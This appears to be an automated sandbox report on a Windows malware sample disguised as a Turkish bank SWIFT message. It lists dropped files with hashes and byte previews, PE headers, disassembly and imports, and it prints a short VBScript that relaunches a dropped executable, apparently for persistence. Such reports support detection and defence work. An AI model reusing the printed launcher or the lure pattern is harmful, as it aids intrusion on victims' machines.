                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\TrojanAI.exe
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Nov 28 16:26:52 2024, mtime=Thu Nov 28 16:26:52 2024, atime=Thu Nov 28 16:26:49 2024, length=231936, window=
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1797
                                                                                                                                                      Entropy (8bit):3.6237095839363285
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8pTfYSHddgGUB21h9bdfvTUNAxs4FSnjug9ZnhLugoqxpJ9pJtm:8VYSHngGc21hv4GK4+juUZtu+JLJt
                                                                                                                                                      MD5:38EAB15B52A69D63BAA3853DFAA6AFB0
                                                                                                                                                      SHA1:135D50B2040FEF39083E6582AAA68F041E950295
                                                                                                                                                      SHA-256:839D28CBBDB161B8EAE4BE0FD405A85B8D80AA02B79429382CC9DAE135E69DE2
                                                                                                                                                      SHA-512:1845DFBBF843129DD89A6DFFFCD7CEC9EF9DC7D02A4D5E11A7E9ED4DC2A50082611006B3EC361FEA5226FB70B83DF5D7A15976EE08FD77D8D4BAE10DF2467CD6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:L..................F.@.. .......A......A..+....A............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.......A..p...A......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=|YV...........................3*N.A.p.p.D.a.t.a...B.V.1.....|YY...Roaming.@......EW.=|YY............................#..R.o.a.m.i.n.g.....T.1.....|Y[...ACCApi..>......|Y[.|Y[...........................i.-.A.C.C.A.p.i.....l.2.....|YY. .TROJAN~1.EXE..P......|Y[.|Y[............................c^.T.r.o.j.a.n.A.I.b.o.t...e.x.e.......h...............-.......g............5W......C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.o.j.a.n.A.I...e.x.e.........%SystemDrive%\Users\user~1\AppData\Local\Temp\TrojanAI.exe............................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\bothsided\spadixes.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):284
                                                                                                                                                      Entropy (8bit):3.425186556485187
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:DMM8lfm3OOQdUfclMMlW8g1UEZ+lX1kyCpFA36nriIM8lfQVn:DsO+vNlMkXg1Q11Cc4mA2n
                                                                                                                                                      MD5:C1807C11D4209B337D8FC181B49ECF3E
                                                                                                                                                      SHA1:7971A0EBBE8AA28EB282F679B32F9A48294B0A45
                                                                                                                                                      SHA-256:0114F70A3AB8DF03718307A70DE0C7942A9B0E4996F0DE3788E9837E0110B4C8
                                                                                                                                                      SHA-512:3FBF941528753F59D20C0C9C081DE3C6F564D41D0AF825192865102A890B01BD24C064B41A3D816474BB5C7B8EAE550A4B205003C020F79C712AB03368F0CAC7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.b.o.t.h.s.i.d.e.d.\.s.p.a.d.i.x.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                                                                                                      Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2847232
                                                                                                                                                      Entropy (8bit):7.748721333789716
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:Dfg5tQ7a/K+TKq8mFmM1I3Dxei0IqfDX40EaY8A55Dmg27RnWGj:7g56lWF31I3D4i0vfDX40EFD527BWG
                                                                                                                                                      MD5:87CA27A96A522D237B95FD9FD5529FFD
                                                                                                                                                      SHA1:6FA6FD7DD93DA1C4D88600FE4867D6CDAE7C4750
                                                                                                                                                      SHA-256:CE1DC42D7BB4C43148A861773C3ED0498BD692FD64DD5611F8B10EF0FE738824
                                                                                                                                                      SHA-512:1EB1BE3D8FA02AD65669ECE7780CA0205F3EC802CE15375258AE3DB0ED32C9C82E09CD8C2CE09A2CCE35C003FDF29E68644B662E8E8FECDF5AC02B7C1D1599EB
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L....}Hg..........".................t_............@...........................+.....7.+.......@.......@......................p..|....@..............................................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc........@......................@..@.reloc.......P".......!.............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1225728
                                                                                                                                                      Entropy (8bit):5.163305429672164
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:TEP3R6bXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Y6bsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                      MD5:4CD8E17DC31C8341472C14897C7F0A30
                                                                                                                                                      SHA1:23B50A801DB8362EFC3C43BD6ADCBF2E2F0DCE0E
                                                                                                                                                      SHA-256:A8DDFB075762F1FD15303AB6CFAE91C7FC9C988BC56C177B7B17D0F8B284A56F
                                                                                                                                                      SHA-512:B63C01DD20EC6609B93C084E513E54B109D0297A40027C9BD971C9EB3F58BEE9650FAA2DC0A0729FC2C786DCF6EB3F5785123FA2AA81C2D3560AA558DE22C7D5
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................n..... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):66
                                                                                                                                                      Entropy (8bit):4.524640141725149
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                                                                                                                      MD5:04A92849F3C0EE6AC36734C600767EFA
                                                                                                                                                      SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                                                                                                                      SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                                                                                                                      SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..
                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Entropy (8bit):7.671031429183209
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                      File name:Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
                                                                                                                                                      File size:2'267'136 bytes
                                                                                                                                                      MD5:fa7dcecb3c5ac81610c93c6b91cda38a
                                                                                                                                                      SHA1:7359e8d92749a87655654a04671239dc7f300af9
                                                                                                                                                      SHA256:3ca1c11c2d4173581e8007b955c912dd1d6abdb1bafe03924aca8cba437df745
                                                                                                                                                      SHA512:da4d80a539618067918fbd81ebcb14ededcb8b90eb07aabfcab018702336ffeb8d6677f21e56ea7ae3671a0ace57b7c660efc50a659227ef7ad0f268d61d5bc9
                                                                                                                                                      SSDEEP:49152:5Vg5tQ7a/K+TKq8mFmM1I3Dxei0IqfDX40EaY8A5:Hg56lWF31I3D4i0vfDX40E
                                                                                                                                                      TLSH:ACA5012363DDC261C3B25173BA65B741AEBF782506A5F96B2FD8093DFD20122520E673
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                                                                                      Icon Hash:aaf3e3e3938382a0
                                                                                                                                                      Entrypoint:0x425f74
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                      Time Stamp:0x67487DC5 [Thu Nov 28 14:27:17 2024 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:5
                                                                                                                                                      OS Version Minor:1
                                                                                                                                                      File Version Major:5
                                                                                                                                                      File Version Minor:1
                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                      Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                                                                                      Instruction
                                                                                                                                                      call 00007FF05CB40FEFh
                                                                                                                                                      jmp 00007FF05CB34004h
                                                                                                                                                      int3
                                                                                                                                                      int3
                                                                                                                                                      push edi
                                                                                                                                                      push esi
                                                                                                                                                      mov esi, dword ptr [esp+10h]
                                                                                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                                                                                      mov eax, ecx
                                                                                                                                                      mov edx, ecx
                                                                                                                                                      add eax, esi
                                                                                                                                                      cmp edi, esi
                                                                                                                                                      jbe 00007FF05CB3418Ah
                                                                                                                                                      cmp edi, eax
                                                                                                                                                      jc 00007FF05CB344EEh
                                                                                                                                                      bt dword ptr [004C0158h], 01h
                                                                                                                                                      jnc 00007FF05CB34189h
                                                                                                                                                      rep movsb
                                                                                                                                                      jmp 00007FF05CB3449Ch
                                                                                                                                                      cmp ecx, 00000080h
                                                                                                                                                      jc 00007FF05CB34354h
                                                                                                                                                      mov eax, edi
                                                                                                                                                      xor eax, esi
                                                                                                                                                      test eax, 0000000Fh
                                                                                                                                                      jne 00007FF05CB34190h
                                                                                                                                                      bt dword ptr [004BA370h], 01h
                                                                                                                                                      jc 00007FF05CB34660h
                                                                                                                                                      bt dword ptr [004C0158h], 00000000h
                                                                                                                                                      jnc 00007FF05CB3432Dh
                                                                                                                                                      test edi, 00000003h
                                                                                                                                                      jne 00007FF05CB3433Eh
                                                                                                                                                      test esi, 00000003h
                                                                                                                                                      jne 00007FF05CB3431Dh
                                                                                                                                                      bt edi, 02h
                                                                                                                                                      jnc 00007FF05CB3418Fh
                                                                                                                                                      mov eax, dword ptr [esi]
                                                                                                                                                      sub ecx, 04h
                                                                                                                                                      lea esi, dword ptr [esi+04h]
                                                                                                                                                      mov dword ptr [edi], eax
                                                                                                                                                      lea edi, dword ptr [edi+04h]
                                                                                                                                                      bt edi, 03h
                                                                                                                                                      jnc 00007FF05CB34193h
                                                                                                                                                      movq xmm1, qword ptr [esi]
                                                                                                                                                      sub ecx, 08h
                                                                                                                                                      lea esi, dword ptr [esi+08h]
                                                                                                                                                      movq qword ptr [edi], xmm1
                                                                                                                                                      lea edi, dword ptr [edi+08h]
                                                                                                                                                      test esi, 00000007h
                                                                                                                                                      je 00007FF05CB341E5h
                                                                                                                                                      bt esi, 03h
                                                                                                                                                      jnc 00007FF05CB34238h
                                                                                                                                                      movdqa xmm1, dqword ptr [esi+00h]
                                                                                                                                                      Programming Language:
                                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                      • [ASM] VS2012 UPD4 build 61030
                                                                                                                                                      • [RES] VS2012 UPD4 build 61030
                                                                                                                                                      • [LNK] VS2012 UPD4 build 61030
                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x160784.rsrc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2250000x6c4c.reloc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                      .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                      .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                      .rsrc0xc40000x1607840x1608006618456ad3f5dc9d0fa811f4d7fc9805False0.9816724844858156data7.987624072827237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .reloc0x2250000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                      RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                      RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                      RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                      RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                                                      RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                                                      RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                                                      RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                                                      RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                                                      RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                                                      RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                                                      RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                                                      RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                                                                                                      RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                                      RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                                                      RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                                      RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                      RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                      RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                                      RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                                      RT_RCDATA0xcc7b80x157a89data1.0003108978271484
                                                                                                                                                      RT_GROUP_ICON0x2242440x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                                                      RT_GROUP_ICON0x2242bc0x14dataEnglishGreat Britain1.25
                                                                                                                                                      RT_GROUP_ICON0x2242d00x14dataEnglishGreat Britain1.15
                                                                                                                                                      RT_GROUP_ICON0x2242e40x14dataEnglishGreat Britain1.25
                                                                                                                                                      RT_VERSION0x2242f80xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                                      RT_MANIFEST0x2243d40x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                                                                                                                      DLLImport
                                                                                                                                                      WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                                                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                      COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                                                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                                      USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                                      UxTheme.dllIsThemeActive
                                                                                                                                                      KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                                                                                      USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                                                                                      GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                      ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
